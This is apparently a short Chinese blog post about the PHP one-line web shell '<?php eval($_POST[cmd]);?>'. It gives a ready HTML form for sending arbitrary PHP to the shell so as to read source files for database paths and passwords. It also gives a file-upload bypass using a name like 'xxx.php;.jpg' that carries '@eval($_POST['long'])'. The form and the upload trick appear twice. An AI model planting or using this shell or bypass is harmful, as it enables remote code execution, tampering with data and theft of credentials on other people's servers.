<?php eval($_POST[cmd]);?>
2015-09-14 18:16
639 查看
执行POST来的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当PHP语句执行,利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成,例如:
<form method=post action=http://....../你的名字.php>
<textarea name=cmd>
//这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码
$str=file_get_content('xxx.php');
$str=str_replace('<','<',$str);
echo "<pre>$str</pre>"
</textarea>
<input type=submit>
</form>
可以上传个图片文件,名称为:CELIVE-31G5CuG3Af.php;.jpg
内容为:<?php @eval($_POST['long']);?>
<form method=post action=http://....../你的名字.php>
<textarea name=cmd>
//这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码
$str=file_get_content('xxx.php');
$str=str_replace('<','<',$str);
echo "<pre>$str</pre>"
</textarea>
<input type=submit>
</form>
可以上传个图片文件,名称为:CELIVE-31G5CuG3Af.php;.jpg
内容为:<?php @eval($_POST['long']);?>
相关文章推荐
- thinkphp 3+ 观后详解 (5)
- ubuntu svn 已跳过 'Admin/*****.php' -- 节点处于冲突状态
- thinkphp 3+ 观后详解 (4)
- php 计算时间添加
- 实时传输协议 RTP
- windows 7_64 免安装手动配置 Apaache2.2+mysql+PHP
- PHP_Get与Post提交后台取值
- php-zmq的安装
- php-utf-8编码下匹配中文
- php empty和isset的区别
- PHP的GD 支持和加载MySQL功能
- erlang OTP中的四大behaviour fsm的例子
- thinkphp+ajax 实现二级联动
- FileZiilla Server Interface.xml
- php获取url的标题
- PHP基于代码模板的编程思想
- vsftpd安装
- PHP中magic_quotes_gpc和 magic_quotes_runtime区别及其反斜线转义问题
- Yaf 使用遇到的坑
- 使用ftp传输文件到arm板